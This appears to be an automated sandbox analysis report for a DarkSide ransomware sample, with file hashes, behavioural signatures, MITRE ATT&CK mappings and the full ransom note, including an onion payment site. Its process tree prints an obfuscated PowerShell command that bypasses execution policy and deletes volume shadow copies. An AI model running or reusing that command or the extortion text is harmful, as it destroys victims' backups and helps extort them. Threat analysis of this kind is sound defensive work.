Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    89s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-01-2024 19:36

General

  • Target

    533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe

  • Size

    59KB

  • MD5

    0e178c4808213ce50c2540468ce409d3

  • SHA1

    38b5aa765026dffbb603e323333294b5f5efa5ee

  • SHA256

    533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d

  • SHA512

    262a8f4808f6c3499c9eb465b480508ed6b082ddd36cf2e618a9455b5abbc2eb6a8d7b7c2f398faaa62ffb22599a8b2eec0d3137fdec648de37ac4a73e6f44f4

  • SSDEEP

    768:vjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylgoVHuY23W58:0x7Fu4/ihrhDTV1yljH5Z58

Malware Config

Extracted

Path

C:\Users\README.95b288ea.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/VGBU8VAXXW7EYB5U4KQJXUGU5NT5FP8208W6UXVSKQDAE3CNBR4JTZQCXEZFZWF2 When you open our website, put the following data in the input form: Key: sWzBJoqqzL4Zn2RW3HUX03kMJd3SWd7m4wOpd3qUa7eex62poH0PPw7q8ONVepO7dEN6e5RAd7rcv5gHKhPV1uhNsHoV924TIKvNciRU1S0rZhklOZB2E3fcb6WquR9dJAbdA7WTO3bEaNproivkWdrzaYiIpn006YgPHpQbAPGJP7hiVtD8SBKSoie2u3ErPSC51J4jVLOqDj1nqdGnZjZGHyKE092eobTQ1AVRz6xa93AFD6YzLs8D5M1ixHXr6p3ft5xplmULrkaOCnSLMPolSLDUYYoSK37JhGkr4yPVRxwFTCuG8jUe83t2q19AZM9lcqC4Vly1Yyhhu4EHwk2S3AEJp27xrv0Ba4qlNY1P8tFdoh8yG4HSPX7qBMJ3Twk2NSSBzx4wV07gFVw4jSn1E5GF4y0OSz71wszVEolQWnM6MMCwoBPBCFEnSN4ehk1AKlR8QqjLXR9Qn2t0BHt3iUssq3uAq5JY4O8M9ZHw2bXlULA9hzxIlOYJtw5zuMqi8rvzMRmx5IRGKKorl4MPDpEyOr2fg5rMjn4axW6IKvxN3XecwB4 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/VGBU8VAXXW7EYB5U4KQJXUGU5NT5FP8208W6UXVSKQDAE3CNBR4JTZQCXEZFZWF2

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (168) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe
    "C:\Users\Admin\AppData\Local\Temp\533672da9d276012ebab3ce9f4cd09a7f537f65c6e4b63d43f0c1697e2f5e48d.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4476
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:5104

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Credential Access

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    bb925cc5c32a817b61b5a68f00475ac2

    SHA1

    368bbcd93d46036334f385fe80a6315130a873f4

    SHA256

    cab89442f228f263a88d3db648093b2389fa2676ee3f95fccdd7c9574a8e1c11

    SHA512

    69688f4277b0dfdeca560166776ecc74ae2933d6808e849ac60e0eb2310333d37e6216edb23737459a0e2395594a1cd579bccd008499e08526393d96315b4634

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    991de10e06e7eb29dcf1800cbcae69ee

    SHA1

    48ff1e6d5efb6c0ac562f68ed971b24e9a7ad3bd

    SHA256

    dbef425ff00001cccdc2b5e2d0aac0022a366e3c2779613d8df9bd8c778e702c

    SHA512

    e9f703d14066091041f2fde4d03b4d5aa7bd292cf344bedc7d448946c3544ca72ee6621aceae7008ebde5d8c7e9dd81b2c927ac9194109240e2dee02486f10a4

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wlh3mp01.n1u.psm1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\README.95b288ea.TXT
    Filesize

    1KB

    MD5

    37aecb74544496ba55b7b5f845179642

    SHA1

    1f5ab1aba12fc3c26919f59a788381d9fbdbb0ee

    SHA256

    6bc3ec4b4807424a51807d1fb758939bc153ea8bd121217c8996fa45fc8c6181

    SHA512

    9c0321e528ae839ff160e63e920af69209ed7e90a8a36b4c4b95498dfd51bdb0ac58636d609284ee1d5527ccbed0f56e031c0f8f3adf6a385106e740396c2641

  • memory/4476-16-0x0000024FEEB30000-0x0000024FEEB52000-memory.dmp
    Filesize

    136KB

  • memory/4476-19-0x0000024FEE0C0000-0x0000024FEE0D0000-memory.dmp
    Filesize

    64KB

  • memory/4476-20-0x0000024FEE0C0000-0x0000024FEE0D0000-memory.dmp
    Filesize

    64KB

  • memory/4476-18-0x0000024FEE0C0000-0x0000024FEE0D0000-memory.dmp
    Filesize

    64KB

  • memory/4476-17-0x00007FFA54420000-0x00007FFA54EE1000-memory.dmp
    Filesize

    10.8MB

  • memory/4476-23-0x00007FFA54420000-0x00007FFA54EE1000-memory.dmp
    Filesize

    10.8MB